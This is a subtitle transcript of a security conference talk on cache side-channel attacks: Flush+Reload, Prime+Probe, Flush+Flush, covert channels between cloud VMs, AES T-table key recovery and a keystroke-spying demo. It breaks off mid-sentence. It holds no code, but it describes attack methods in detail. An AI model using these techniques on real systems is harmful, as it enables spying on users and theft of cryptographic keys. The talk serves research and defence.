1
00:00:00,000 --> 00:00:13,245
Music
2
00:00:13,245 --> 00:00:17,060
Herald Angel: We are here with a motto,
and the motto of this year is "Works For
3
00:00:17,060 --> 00:00:21,670
Me" and I think, who many people, how many
people in here are programmmers? Raise
4
00:00:21,670 --> 00:00:28,700
your hands or shout or... Whoa, that's a
lot. Okay. So I think many of you will
5
00:00:28,700 --> 00:00:38,990
work on x86. Yeah. And I think you assume
that it works, and that everything works
6
00:00:38,990 --> 00:00:48,150
as intended And I mean: What could go
wrong? Our next talk, the first one today,
7
00:00:48,150 --> 00:00:52,290
will be by Clémentine Maurice, who
previously was here with RowhammerJS,
8
00:00:52,290 --> 00:01:01,740
something I would call scary, and Moritz
Lipp, who has worked on the Armageddon
9
00:01:01,740 --> 00:01:09,820
exploit, back, what is it? Okay, so the
next... I would like to hear a really warm
10
00:01:09,820 --> 00:01:14,460
applause for the speakers for the talk
"What could what could possibly go wrong
11
00:01:14,460 --> 00:01:17,280
with insert x86 instruction here?"
12
00:01:17,280 --> 00:01:18,375
thank you.
13
00:01:18,375 --> 00:01:28,290
Applause
14
00:01:28,290 --> 00:01:32,530
Clémentine Maurice (CM): Well, thank you
all for being here this morning. Yes, this
15
00:01:32,530 --> 00:01:38,080
is our talk "What could possibly go wrong
with insert x86 instructions here". So
16
00:01:38,080 --> 00:01:42,850
just a few words about ourselves: So I'm
Clémentine Maurice, I got my PhD last year
17
00:01:42,850 --> 00:01:47,119
in computer science and I'm now working as
a postdoc at Graz University of Technology
18
00:01:47,119 --> 00:01:52,090
in Austria. You can reach me on Twitter or
by email but there's also I think a lots
19
00:01:52,090 --> 00:01:56,670
of time before the Congress is over.
Moritz Lipp (ML): Hi and my name is Moritz
20
00:01:56,670 --> 00:02:01,520
Lipp, I'm a PhD student at Graz University
of Technology and you can also reach me on
21
00:02:01,520 --> 00:02:06,679
Twitter or just after our talk and in the
next days.
22
00:02:06,679 --> 00:02:10,860
CM: So, about this talk: So, the title
says this is a talk about x86
23
00:02:10,860 --> 00:02:17,720
instructions, but this is not a talk about
software. Don't leave yet! I'm actually
24
00:02:17,720 --> 00:02:22,440
even assuming safe software and the point
that we want to make is that safe software
25
00:02:22,440 --> 00:02:27,390
does not mean safe execution and we have
information leakage because of the
26
00:02:27,390 --> 00:02:32,560
underlying hardware and this is what we're
going to talk about today. So we'll be
27
00:02:32,560 --> 00:02:36,819
talking about cache attacks, what are
they, what can we do with that and also a
28
00:02:36,819 --> 00:02:41,510
special kind of cache attack that we found
this year. So... doing cache attacks
29
00:02:41,510 --> 00:02:48,590
without memory accesses and how to use
that even to bypass kernel ASLR.
30
00:02:48,590 --> 00:02:53,129
So again, the talk says is to talk about
x86 instructions but this is even more
31
00:02:53,129 --> 00:02:58,209
global than that. We can also mount these
cache attacks on ARM and not only on the
32
00:02:58,209 --> 00:03:07,050
x86. So some of the examples that you will
see also applies to ARM. So today we'll do
33
00:03:07,050 --> 00:03:11,420
have a bit of background, but actually
most of the background will be along the
34
00:03:11,420 --> 00:03:19,251
lines because this covers really a huge
chunk of our research, and we'll see
35
00:03:19,251 --> 00:03:24,209
mainly three instructions: So "mov" and
how we can perform these cache attacks,
36
00:03:24,209 --> 00:03:29,430
what are they... The instruction
"clflush", so here we'll be doing cache
37
00:03:29,430 --> 00:03:36,370
attacks without any memory accesses. Then
we'll see "prefetch" and how we can bypass
38
00:03:36,370 --> 00:03:43,420
kernel ASLR and lots of translations
levels, and then there's even a bonus
39
00:03:43,420 --> 00:03:48,950
track, so it's this this will be not our
works, but even more instructions and even
40
00:03:48,950 --> 00:03:54,210
more text.
Okay, so let's start with a bit of an
41
00:03:54,210 --> 00:04:01,190
introduction. So we will be mainly
focusing on Intel CPUs, and this is
42
00:04:01,190 --> 00:04:05,599
roughly in terms of cores and caches, how
it looks like today. So we have different
43
00:04:05,599 --> 00:04:09,440
levels of cores ...uh... different cores
so here four cores, and different levels
44
00:04:09,440 --> 00:04:14,220
of caches. So here usually we have three
levels of caches. We have level 1 and
45
00:04:14,220 --> 00:04:18,269
level 2 that are private to each call,
which means that core 0 can only access
46
00:04:18,269 --> 00:04:24,520
its level 1 and its level 2 and not level
1 and level 2 of, for example, core 3, and
47
00:04:24,520 --> 00:04:30,130
we have the last level cache... so here if
you can see the pointer... So this one is
48
00:04:30,130 --> 00:04:36,289
divided in slices so we have as many
slices as cores, so here 4 slices, but all
49
00:04:36,289 --> 00:04:40,659
the slices are shared across core so core
0 can access the whole last level cache,
50
00:04:40,659 --> 00:04:48,669
that's 0 1 2 & 3. We also have a nice
property on Intel CPUs is that this level
51
00:04:48,669 --> 00:04:52,280
of cache is inclusive, and what it means
is that everything that is contained in
52
00:04:52,280 --> 00:04:56,889
level 1 and level 2 will also be contained
in the last level cache, and this will
53
00:04:56,889 --> 00:05:01,439
prove to be quite useful for cache
attacks.
54
00:05:01,439 --> 00:05:08,430
So today we mostly have set associative
caches. What it means is that we have data
55
00:05:08,430 --> 00:05:13,249
that is loaded in specific sets and that
depends only on its address. So we have
56
00:05:13,249 --> 00:05:18,900
some bits of the address that gives us the
index and that says "Ok the line is going
57
00:05:18,900 --> 00:05:24,610
to be loaded in this cache set", so this
is a cache set. Then we have several ways
58
00:05:24,610 --> 00:05:30,629
per set so here we have 4 ways and the
cacheine is going to be loaded in a
59
00:05:30,629 --> 00:05:35,270
specific way and that will only depend on
the replacement policy and not on the
60
00:05:35,270 --> 00:05:40,800
address itself, so when you load a line
into the cache, usually the cache is
61
00:05:40,800 --> 00:05:44,830
already full and you have to make room for
a new line. So this is where the
62
00:05:44,830 --> 00:05:49,729
replacement replacement policy—this is
what it does—it says ok I'm going to
63
00:05:49,729 --> 00:05:57,779
remove this line to make room for the next
line. So for today we're going to see only
64
00:05:57,779 --> 00:06:01,960
three instruction as I've been telling
you. So the move instruction, it does a
65
00:06:01,960 --> 00:06:06,610
lot of things but the only aspect that
we're interested in about it that can
66
00:06:06,610 --> 00:06:12,809
access data in the main memory.
We're going to see a clflush what it does
67
00:06:12,809 --> 00:06:18,349
is that it removes a cache line from the
cache, from the whole cache. And we're
68
00:06:18,349 --> 00:06:25,569
going to see prefetch, it prefetches a
cache line for future use. So we're going
69
00:06:25,569 --> 00:06:30,520
to see what they do and the kind of side
effects that they have and all the attacks
70
00:06:30,520 --> 00:06:34,800
that we can do with them. And that's
basically all the example you need for
71
00:06:34,800 --> 00:06:39,830
today so even if you're not an expert of
x86 don't worry it's not just slides full
72
00:06:39,830 --> 00:06:44,899
of assembly and stuff. Okay so on to the
first one.
73
00:06:44,899 --> 00:06:49,940
ML: So we will first start with the 'mov'
instruction and actually the first slide
74
00:06:49,940 --> 00:06:57,809
is full of code, however as you can see
the mov instruction is used to move data
75
00:06:57,809 --> 00:07:02,629
from registers to registers, from the main
memory and back to the main memory and as
76
00:07:02,629 --> 00:07:07,240
you can see there are many moves you can
use but basically it's just to move data
77
00:07:07,240 --> 00:07:12,589
and that's all we need to know. In
addition, a lot of exceptions can occur so
78
00:07:12,589 --> 00:07:18,139
we can assume that those restrictions are
so tight that nothing can go wrong when
79
00:07:18,139 --> 00:07:22,210
you just move data because moving data is
simple.
80
00:07:22,210 --> 00:07:27,879
However while there are a lot of
exceptions the data that is accessed is
81
00:07:27,879 --> 00:07:35,009
always loaded into the cache, so data is
in the cache and this is transparent to
82
00:07:35,009 --> 00:07:40,870
the program that is running. However,
there are side-effects when you run these
83
00:07:40,870 --> 00:07:46,219
instructions, and we will see how they
look like with the mov instruction. So you
84
00:07:46,219 --> 00:07:51,289
probably all know that data can either be
in CPU registers, in the different levels
85
00:07:51,289 --> 00:07:56,029
of the cache that Clementine showed to you
earlier, in the main memory, or on the
86
00:07:56,029 --> 00:08:02,219
disk, and depending on where the memory
and the data is located it needs a longer
87
00:08:02,219 --> 00:08:09,689
time to be loaded back to the CPU, and
this is what we can see in this plot. So
88
00:08:09,689 --> 00:08:15,739
we try here to measure the access time of
an address over and over again, assuming
89
00:08:15,739 --> 00:08:21,759
that when we access it more often, it is
already stored in the cache. So around 70
90
00:08:21,759 --> 00:08:27,289
cycles, most of the time we can assume
when we load an address and it takes 70
91
00:08:27,289 --> 00:08:34,809
cycles, it's loaded into the cache.
However, when we assume that the data is
92
00:08:34,809 --> 00:08:39,659
loaded from the main memory, we can
clearly see that it needs a much longer
93
00:08:39,659 --> 00:08:46,720
time like a bit more than 200 cycles. So
depending when we measure the time it
94
00:08:46,720 --> 00:08:51,470
takes to load the address we can say the
data has been loaded to the cache or the
95
00:08:51,470 --> 00:08:58,339
data is still located in the main memory.
And this property is what we can exploit
96
00:08:58,339 --> 00:09:05,339
using cache attacks. So we measure the
timing differences on memory accesses. And
97
00:09:05,339 --> 00:09:09,940
what an attacker does he monitors the
cache lines, but he has no way to know
98
00:09:09,940 --> 00:09:14,459
what's actually the content of the cache
line. So we can only monitor that this
99
00:09:14,459 --> 00:09:20,099
cache line has been accessed and not
what's actually stored in the cache line.
100
00:09:20,099 --> 00:09:24,411
And what you can do with this is you can
implement covert channels, so you can
101
00:09:24,411 --> 00:09:29,580
allow two processes to communicate with
each other evading the permission system
102
00:09:29,580 --> 00:09:35,060
what we will see later on. In addition you
can also do side channel attacks, so you
103
00:09:35,060 --> 00:09:40,600
can spy with a malicious attacking
application on benign processes, and you
104
00:09:40,600 --> 00:09:46,140
can use this to steal cryptographic keys
or to spy on keystrokes.
105
00:09:46,140 --> 00:09:53,649
And basically we have different types of
cache attacks and I want to explain the
106
00:09:53,649 --> 00:09:58,810
most popular one, the "Flush+Reload"
attack, in the beginning. So on the left,
107
00:09:58,810 --> 00:10:03,110
you have the address space of the victim,
and on the right you have the address
108
00:10:03,110 --> 00:10:08,560
space of the attacker who maps a shared
library—an executable—that the victim is
109
00:10:08,560 --> 00:10:14,899
using in to its own address space, like
the red rectangle. And this means that
110
00:10:14,899 --> 00:10:22,760
when this data is stored in the cache,
it's cached for both processes. Now the
111
00:10:22,760 --> 00:10:28,170
attacker can use the flush instruction to
remove the data out of the cache, so it's
112
00:10:28,170 --> 00:10:34,420
not in the cache anymore, so it's also not
cached for the victim. Now the attacker
113
00:10:34,420 --> 00:10:39,100
can schedule the victim and if the victim
decides "yeah, I need this data", it will
114
00:10:39,100 --> 00:10:44,970
be loaded back into the cache. And now the
attacker can reload the data, measure the
115
00:10:44,970 --> 00:10:49,661
time how long it took, and then decide
"okay, the victim has accessed the data in
116
00:10:49,661 --> 00:10:54,179
the meantime" or "the victim has not
accessed the data in the meantime." And by
117
00:10:54,179 --> 00:10:58,959
that you can spy if this address has been
used.
118
00:10:58,959 --> 00:11:03,240
The second type of attack is called
"Prime+Probe" and it does not rely on the
119
00:11:03,240 --> 00:11:08,971
shared memory like the "Flush+Reload"
attack, and it works as following: Instead
120
00:11:08,971 --> 00:11:16,139
of mapping anything into its own address
space, the attacker loads a lot of data
121
00:11:16,139 --> 00:11:24,589
into one cache line, here, and fills the
cache. Now he again schedules the victim
122
00:11:24,589 --> 00:11:31,820
and the schedule can access data that maps
to the same cache set.
123
00:11:31,820 --> 00:11:38,050
So the cache set is used by the attacker
and the victim at the same time. Now the
124
00:11:38,050 --> 00:11:43,050
attacker can start measuring the access
time to the addresses he loaded into the
125
00:11:43,050 --> 00:11:49,050
cache before, and when he accesses an
address that is still in the cache it's
126
00:11:49,050 --> 00:11:55,649
faster so he measures the lower time. And
if it's not in the cache anymore it has to
127
00:11:55,649 --> 00:12:01,279
be reloaded into the cache so it takes a
longer time. He can sum this up and detect
128
00:12:01,279 --> 00:12:07,870
if the victim has loaded data into the
cache as well. So the first thing we want
129
00:12:07,870 --> 00:12:11,900
to show you is what you can do with cache
attacks is you can implement a covert
130
00:12:11,900 --> 00:12:17,439
channel and this could be happening in the
following scenario.
131
00:12:17,439 --> 00:12:23,610
You install an app on your phone to view
your favorite images you take, to apply
132
00:12:23,610 --> 00:12:28,630
some filters, and in the end you don't
know that it's malicious because the only
133
00:12:28,630 --> 00:12:33,609
permission it requires is to access your
images which makes sense. So you can
134
00:12:33,609 --> 00:12:38,700
easily install it without any fear. In
addition you want to know what the weather
135
00:12:38,700 --> 00:12:43,040
is outside, so you install a nice little
weather widget, and the only permission it
136
00:12:43,040 --> 00:12:48,230
has is to access the internet because it
has to load the information from
137
00:12:48,230 --> 00:12:55,569
somewhere. So what happens if you're able
to implement a covert channel between two
138
00:12:55,569 --> 00:12:59,779
these two applications, without any
permissions and privileges so they can
139
00:12:59,779 --> 00:13:05,060
communicate with each other without using
any mechanisms provided by the operating
140
00:13:05,060 --> 00:13:11,149
system, so it's hidden. It can happen that
now the gallery app can send the image to
141
00:13:11,149 --> 00:13:18,680
the internet, it will be uploaded and
exposed for everyone. So maybe you don't
142
00:13:18,680 --> 00:13:25,610
want to see the cat picture everywhere.
While we can do this with those
143
00:13:25,610 --> 00:13:30,219
Prime+Probe/ Flush+Reload attacks, we will
discuss a covert channel using
144
00:13:30,219 --> 00:13:35,690
Prime+Probe. So how can we transmit this
data? We need to transmit ones and zeros
145
00:13:35,690 --> 00:13:40,980
at some point. So the sender and the
receiver agree on one cache set that they
146
00:13:40,980 --> 00:13:49,319
both use. The receiver probes the set all
the time. When the sender wants to
147
00:13:49,319 --> 00:13:57,529
transmit a zero he just does nothing, so
the lines of the receiver are in the cache
148
00:13:57,529 --> 00:14:01,809
all the time, and he knows "okay, he's
sending nothing", so it's a zero.
149
00:14:01,809 --> 00:14:05,940
On the other hand if the sender wants to
transmit a one, he starts accessing
150
00:14:05,940 --> 00:14:10,800
addresses that map to the same cache set
so it will take a longer time for the
151
00:14:10,800 --> 00:14:16,540
receiver to access its addresses again,
and he knows "okay, the sender just sent
152
00:14:16,540 --> 00:14:23,059
me a one", and Clementine will show you
what you can do with this covert channel.
153
00:14:23,059 --> 00:14:25,180
CM: So the really nice thing about
154
00:14:25,180 --> 00:14:28,959
Prime+Probe is that it has really low
requirements. It doesn't need any kind of
155
00:14:28,959 --> 00:14:34,349
shared memory. For example if you have two
virtual machines you could have some
156
00:14:34,349 --> 00:14:38,700
shared memory via memory deduplication.
The thing is that this is highly insecure,
157
00:14:38,700 --> 00:14:43,969
so cloud providers like Amazon ec2, they
disable that. Now we can still use
158
00:14:43,969 --> 00:14:50,429
Prime+Probe because it doesn't need this
shared memory. Another problem with cache
159
00:14:50,429 --> 00:14:54,999
covert channels is that they are quite
noisy. So when you have other applications
160
00:14:54,999 --> 00:14:59,259
that are also running on the system, they
are all competing for the cache and they
161
00:14:59,259 --> 00:15:03,009
might, like, evict some cache lines,
especially if it's an application that is
162
00:15:03,009 --> 00:15:08,749
very memory intensive. And you also have
noise due to the fact that the sender and
163
00:15:08,749 --> 00:15:12,770
the receiver might not be scheduled at the
same time. So if you have your sender that
164
00:15:12,770 --> 00:15:16,649
sends all the things and the receiver is
not scheduled then some part of the
165
00:15:16,649 --> 00:15:22,539
transmission can get lost. So what we did
is we tried to build an error-free covert
166
00:15:22,539 --> 00:15:30,829
channel. We took care of all these noise
issues by using some error detection to
167
00:15:30,829 --> 00:15:36,470
resynchronize the sender and the receiver
and then we use some error correction to
168
00:15:36,470 --> 00:15:40,779
correct the remaining errors.
So we managed to have a completely error-
169
00:15:40,779 --> 00:15:46,069
free covert channel even if you have a lot
of noise, so let's say another virtual
170
00:15:46,069 --> 00:15:54,119
machine also on the machine serving files
through a web server, also doing lots of
171
00:15:54,119 --> 00:16:01,600
memory-intensive tasks at the same time,
and the covert channel stayed completely
172
00:16:01,600 --> 00:16:07,610
error-free, and around 40 to 75 kilobytes
per second, which is still quite a lot.
173
00:16:07,610 --> 00:16:14,470
All of this is between virtual machines on
Amazon ec2. And the really neat thing—we
174
00:16:14,470 --> 00:16:19,389
wanted to do something with that—and
basically we managed to create an SSH
175
00:16:19,389 --> 00:16:27,060
connection really over the cache. So they
don't have any network between
176
00:16:27,060 --> 00:16:31,439
them, but just we are sending the zeros
and the ones and we have an SSH connection
177
00:16:31,439 --> 00:16:36,839
between them. So you could say that cache
covert channels are nothing, but I think
178
00:16:36,839 --> 00:16:43,079
it's a real threat. And if you want to
have more details about this work in
179
00:16:43,079 --> 00:16:49,220
particular, it will be published soon at
NDSS.
180
00:16:49,220 --> 00:16:54,040
So the second application that we wanted
to show you is that we can attack crypto
181
00:16:54,040 --> 00:17:01,340
with cache attacks. In particular we are
going to show an attack on AES and a
182
00:17:01,340 --> 00:17:04,990
special implementation of AES that uses
T-Tables. so that's the fast software
183
00:17:04,990 --> 00:17:11,650
implementation because it uses some
precomputed lookup tables. It's known to
184
00:17:11,650 --> 00:17:17,490
be vulnerable to side-channel attacks
since 2006 by Osvik et al, and it's a one-
185
00:17:17,490 --> 00:17:24,110
round known plaintext attack, so you have
p—or plaintext—and k, your secret key. And
186
00:17:24,110 --> 00:17:29,570
the AES algorithm, what it does is compute
an intermediate state at each round r.
187
00:17:29,570 --> 00:17:38,559
And in the first round, the accessed table
indices are just p XOR k. Now it's a known
188
00:17:38,559 --> 00:17:43,500
plaintext attack, what this means is that
if you can recover the accessed table
189
00:17:43,500 --> 00:17:49,460
indices you've also managed to recover the
key because it's just XOR. So that would
190
00:17:49,460 --> 00:17:55,450
be bad, right, if we could recover these
accessed table indices. Well we can, with
191
00:17:55,450 --> 00:18:00,510
cache attacks! So we did that with
Flush+Reload and with Prime+Probe. On the
192
00:18:00,510 --> 00:18:05,809
x-axis you have the plaintext byte values
and on the y-axis you have the addresses
193
00:18:05,809 --> 00:18:15,529
which are essentially the T table entries.
So a black cell means that we've monitored
194
00:18:15,529 --> 00:18:19,970
the cache line, and we've seen a lot of
cache hits. So basically the blacker it
195
00:18:19,970 --> 00:18:25,650
is, the more certain we are that the
T-Table entry has been accessed. And here
196
00:18:25,650 --> 00:18:31,779
it's a toy example, the key is all-zeros,
but you would basically just have a
197
00:18:31,779 --> 00:18:35,700
different pattern if the key was not all-
zeros, and as long as you can see this
198
00:18:35,700 --> 00:18:43,409
nice diagonal or a pattern then you have
recovered the key. So it's an old attack,
199
00:18:43,409 --> 00:18:48,890
2006, it's been 10 years, everything
should be fixed by now, and you see where
200
00:18:48,890 --> 00:18:56,880
I'm going: it's not. So on Android the
bouncy castle implementation it uses by
201
00:18:56,880 --> 00:19:03,360
default the T-table, so that's bad. Also
many implementations that you can find
202
00:19:03,360 --> 00:19:11,380
online uses pre-computed values, so maybe
be wary about this kind of attacks. The
203
00:19:11,380 --> 00:19:17,240
last application we wanted to show you is
how we can spy on keystrokes.
204
00:19:17,240 --> 00:19:21,480
So for that we will use flush and reload
because it's a really fine grained
205
00:19:21,480 --> 00:19:26,309
attack. We can see very precisely which
cache line has been accessed, and a cache
206
00:19:26,309 --> 00:19:31,440
line is only 64 bytes so it's really not a
lot and we're going to use that to spy on
207
00:19:31,440 --> 00:19:37,690
keystrokes and we even have a small demo
for you.
208
00:19:40,110 --> 00:19:45,640
ML: So what you can see on the screen this
is not on Intel x86 it's on a smartphone,
209
00:19:45,640 --> 00:19:50,330
on the Galaxy S6, but you can also apply
these cache attacks there so that's what
210
00:19:50,330 --> 00:19:53,850
we want to emphasize.
So on the left you see the screen and on
211
00:19:53,850 --> 00:19:57,960
the right we have connected a shell with
no privileges and permissions, so it can
212
00:19:57,960 --> 00:20:00,799
basically be an app that you install
glass bottle falling
213
00:20:00,799 --> 00:20:09,480
from the App Store and on the right we are
going to start our spy tool, and on the
214
00:20:09,480 --> 00:20:14,110
left we just open the messenger app and
whenever the user hits any key on the
215
00:20:14,110 --> 00:20:19,690
keyboard our spy tool takes care of that
and notices that. Also if he presses the
216
00:20:19,690 --> 00:20:26,120
spacebar we can also measure that. If the
user decides "ok, I want to delete the
217
00:20:26,120 --> 00:20:30,880
word" because he changed his mind, we can
also register if the user pressed the
218
00:20:30,880 --> 00:20:37,929
backspace button, so in the end we can see
exactly how long the words were, the user
219
00:20:37,929 --> 00:20:45,630
typed into his phone without any
permissions and privileges, which is bad.
220
00:20:45,630 --> 00:20:55,250
laughs
applause
221
00:20:55,250 --> 00:21:00,320
ML: so enough about the mov instruction,
let's head to clflush.
222
00:21:00,320 --> 00:21:07,230
CM: So the clflush instruction: What it
does is that it invalidates from every
223
00:21:07,230 --> 00:21:12,309
level the cache line that contains the
address that you pass to this instruction.
224
00:21:12,309 --> 00:21:16,990
So in itself it's kind of bad because it
enables the Flush+Reload attacks that we
225
00:21:16,990 --> 00:21:21,300
showed earlier, that was just flush,
reload, and the flush part is done with
226
00:21:21,300 --> 00:21:29,140
clflush. But there's actually more to it,
how wonderful. So there's a first timing
227
00:21:29,140 --> 00:21:33,320
leakage with it, so we're going to see
that the clflush instruction has a
228
00:21:33,320 --> 00:21:37,890
different timing depending on whether the
data that you that you pass to it is
229
00:21:37,890 --> 00:21:44,710
cached or not. So imagine you have a cache
line that is on the level 1 by inclu...
230
00:21:44,710 --> 00:21:50,299
With the inclusion property it has to be
also in the last level cache. Now this is
231
00:21:50,299 --> 00:21:54,350
quite convenient and this is also why we
have this inclusion property for
232
00:21:54,350 --> 00:22:00,019
performance reason on Intel CPUs, if you
want to see if a line is present at all in
233
00:22:00,019 --> 00:22:04,209
the cache you just have to look in the
last level cache. So this is basically
234
00:22:04,209 --> 00:22:08,010
what the clflush instruction does. It goes
to the last last level cache, sees "ok
235
00:22:08,010 --> 00:22:12,890
there's a line, I'm going to flush this
one" and then there's something that tells
236
00:22:12,890 --> 00:22:18,950
ok the line is also present somewhere else
so then it flushes the line in level 1
237
00:22:18,950 --> 00:22:26,390
and/or level 2. So that's slow. Now if you
perform clflush on some data that is not
238
00:22:26,390 --> 00:22:32,240
cached, basically it does the same, goes
to the last level cache, see that there's
239
00:22:32,240 --> 00:22:36,659
no line and there can't be any... This
data can't be anywhere else in the cache
240
00:22:36,659 --> 00:22:41,269
because it would be in the last level
cache if it was anywhere, so it does
241
00:22:41,269 --> 00:22:47,430
nothing and it stop there. So that's fast.
So how exactly fast and slow am I talking
242
00:22:47,430 --> 00:22:53,760
about? So it's actually only a very few
cycles so we did this experiments on
243
00:22:53,760 --> 00:22:59,072
different microarchitecture so Center
Bridge, Ivy Bridge, and Haswell and...
244
00:22:59,072 --> 00:23:03,250
So it different colors correspond to the
different microarchitecture. So first
245
00:23:03,250 --> 00:23:07,880
thing that is already... kinda funny is
that you can see that you can distinguish
246
00:23:07,880 --> 00:23:14,649
the micro architecture quite nicely with
this, but the real point is that you have
247
00:23:14,649 --> 00:23:20,280
really a different zones. The solids...
The solid line is when we performed the
248
00:23:20,280 --> 00:23:25,200
measurement on clflush with the line that
was already in the cache, and the dashed
249
00:23:25,200 --> 00:23:30,840
line is when the line was not in the
cache, and in all microarchitectures you
250
00:23:30,840 --> 00:23:36,539
can see that we can see a difference: It's
only a few cycles, it's a bit noisy, so
251
00:23:36,539 --> 00:23:43,250
what could go wrong? Okay, so exploiting
these few cycles, we still managed to
252
00:23:43,250 --> 00:23:47,029
perform a new cache attacks that we call
"Flush+Flush", so I'm going to explain
253
00:23:47,029 --> 00:23:52,220
that to you: So basically everything that
we could do with "Flush+Reload", we can
254
00:23:52,220 --> 00:23:56,899
also do with "Flush+Flush". We can perform
cover channels and sidechannel attacks.
255
00:23:56,899 --> 00:24:01,090
It's stealthier than previous cache
attacks, I'm going to go back on this one,
256
00:24:01,090 --> 00:24:07,220
and it's also faster than previous cache
attacks. So how does it work exactly? So
257
00:24:07,220 --> 00:24:12,210
the principle is a bit similar to
"Flush+Reload": So we have the attacker
258
00:24:12,210 --> 00:24:16,131
and the victim that have some kind of
shared memory, let's say a shared library.
259
00:24:16,131 --> 00:24:21,340
It will be shared in the cache The
attacker will start by flushing the cache
260
00:24:21,340 --> 00:24:26,510
line then let's the victim perform
whatever it does, let's say encryption,
261
00:24:26,510 --> 00:24:32,120
the victim will load some data into the
cache, automatically, and now the attacker
262
00:24:32,120 --> 00:24:36,720
wants to know again if the victim accessed
this precise cache line and instead of
263
00:24:36,720 --> 00:24:43,540
reloading it is going to flush it again.
And since we have this timing difference
264
00:24:43,540 --> 00:24:47,040
depending on whether the data is in the
cache or not, it gives us the same
265
00:24:47,040 --> 00:24:54,889
information as if we reloaded it, except
it's way faster. So I talked about
266
00:24:54,889 --> 00:24:59,690
stealthiness. So the thing is that
basically these cache attacks and that
267
00:24:59,690 --> 00:25:06,340
also applies to "Rowhammer": They are
already stealth in themselves, because
268
00:25:06,340 --> 00:25:10,470
there's no antivirus today that can detect
them. but some people thought that we
269
00:25:10,470 --> 00:25:14,351
could detect them with performance
counters because they do a lot of cache
270
00:25:14,351 --> 00:25:18,549
misses and cache references that happen
when the data is flushed and when you
271
00:25:18,549 --> 00:25:26,090
reaccess memory. now what we thought is
that yeah but that also not the only
272
00:25:26,090 --> 00:25:31,269
program steps to lots of cache misses and
cache references so we would like to have
273
00:25:31,269 --> 00:25:38,120
a slightly parametric. So these cache
attacks they have a very heavy activity on
274
00:25:38,120 --> 00:25:43,840
the cache but they're also very particular
because there are very short loops of code
275
00:25:43,840 --> 00:25:48,610
if you take flush and reload this just
flush one line reload the line and then
276
00:25:48,610 --> 00:25:53,750
again flush reload that's very short loop
and that creates a very low pressure on
277
00:25:53,750 --> 00:26:01,490
the instruction therapy which is kind of
particular for of cache attacks so what we
278
00:26:01,490 --> 00:26:05,380
decided to do is normalizing the cache
even so the cache misses and cache
279
00:26:05,380 --> 00:26:10,720
references by events that have to do with
the instruction TLB and there we could
280
00:26:10,720 --> 00:26:19,360
manage to detect cache attacks and
Rowhammer without having false positives
281
00:26:19,360 --> 00:26:24,510
so the system metric that I'm going to use
when I talk about stealthiness so we
282
00:26:24,510 --> 00:26:29,750
started by creating a cover channel. First
we wanted to have it as fast as possible
283
00:26:29,750 --> 00:26:36,160
so we created a protocol to evaluates all
the kind of cache attack that we had so
284
00:26:36,160 --> 00:26:40,540
flush+flush, flush+reload, and
prime+probe and we started with a
285
00:26:40,540 --> 00:26:47,010
packet side of 28 doesn't really matter.
We measured the capacity of our covert
286
00:26:47,010 --> 00:26:52,799
channel and flush+flush is around
500 kB/s whereas Flush+Reload
287
00:26:52,799 --> 00:26:56,340
was only 300 kB/s
so Flush+Flush is already quite an
288
00:26:56,340 --> 00:27:00,740
improvement on the speed.
Then we measured the stealth zone at this
289
00:27:00,740 --> 00:27:06,100
speed only Flush+Flush was stealth and
now the thing is that Flush+Flush and
290
00:27:06,100 --> 00:27:10,200
Flush+Reload as you've seen there are
some similarities so for a covert channel
291
00:27:10,200 --> 00:27:15,309
they also share the same center on it is
receivers different and for this one the
292
00:27:15,309 --> 00:27:20,000
center was not stealth for both of them
anyway if you want a fast covert channel
293
00:27:20,000 --> 00:27:26,640
then just try flush+flush that works.
Now let's try to make it stealthy
294
00:27:26,640 --> 00:27:30,639
completely stealthy because if I have the
standard that is not stealth maybe that we
295
00:27:30,639 --> 00:27:36,440
give away the whole attack so we said okay
maybe if we just slow down all the attacks
296
00:27:36,440 --> 00:27:41,240
then there will be less cache hits,
cache misses and then maybe all
297
00:27:41,240 --> 00:27:48,070
the attacks are actually stealthy why not?
So we tried that we slowed down everything
298
00:27:48,070 --> 00:27:52,889
so Flush+Reload and Flash+Flash
are around 50 kB/s now
299
00:27:52,889 --> 00:27:55,829
Prime+Probe is a bit slower because it
takes more time
300
00:27:55,829 --> 00:28:01,330
to prime and probe anything but still
301
00:28:01,330 --> 00:28:09,419
even with this slow down only Flush+Flush
has its receiver stealth and we also
302
00:28:09,419 --> 00:28:14,769
managed to have the sender stealth now so
basically whether you want a fast covert
303
00:28:14,769 --> 00:28:20,450
channel or a stealth covert channel
Flush+Flush is really great.
304
00:28:20,450 --> 00:28:26,500
Now we wanted to also evaluate if it
wasn't too noisy to perform some side
305
00:28:26,500 --> 00:28:30,740
channel attack so we did these side
channels on the AES t-table implementation
306
00:28:30,740 --> 00:28:35,910
the attacks that we have shown you
earlier, so we computed a lot of
307
00:28:35,910 --> 00:28:41,820
encryption that we needed to determine the
upper four bits of a key bytes so here the
308
00:28:41,820 --> 00:28:48,870
lower the better the attack and Flush +
Reload is a bit better so we need only 250
309
00:28:48,870 --> 00:28:55,029
encryptions to recover these bits but
Flush+Flush comes quite, comes quite
310
00:28:55,029 --> 00:29:00,570
close with 350 and Prime+Probe is
actually the most noisy of them all, needs
311
00:29:00,570 --> 00:29:06,101
5... close to 5000 encryptions so we have
around the same performance for
312
00:29:06,101 --> 00:29:13,520
Flush+Flush and Flush+Reload.
Now let's evaluate the stealthiness again.
313
00:29:13,520 --> 00:29:19,320
So what we did here is we perform 256
billion encryptions in a synchronous
314
00:29:19,320 --> 00:29:25,740
attack so we really had the spy and the
victim scattered and we evaluated the
315
00:29:25,740 --> 00:29:31,409
stealthiness of them all and here only
Flush+Flush again is stealth. And while
316
00:29:31,409 --> 00:29:36,279
you can always slow down a covert channel
you can't actually slow down a side
317
00:29:36,279 --> 00:29:40,700
channel because, in a real-life scenario,
you're not going to say "Hey victim, him
318
00:29:40,700 --> 00:29:47,179
wait for me a bit, I am trying to do an
attack here." That won't work.
319
00:29:47,179 --> 00:29:51,429
So there's even more to it but I will need
again a bit of background before
320
00:29:51,429 --> 00:29:56,910
continuing. So I've shown you the
different levels of caches and here I'm
321
00:29:56,910 --> 00:30:04,009
going to focus more on the last-level
cache. So we have here our four slices so
322
00:30:04,009 --> 00:30:09,830
this is the last-level cache and we have
some bits of the address here that
323
00:30:09,830 --> 00:30:14,330
corresponds to the set, but more
importantly, we need to know where in
324
00:30:14,330 --> 00:30:19,899
which slice and address is going to be.
And that is given, that is given by some
325
00:30:19,899 --> 00:30:23,850
bits of the set and the type of the
address that are passed into a function
326
00:30:23,850 --> 00:30:27,960
that says in which slice the line is going
to be.
327
00:30:27,960 --> 00:30:32,460
Now the thing is that this hash function
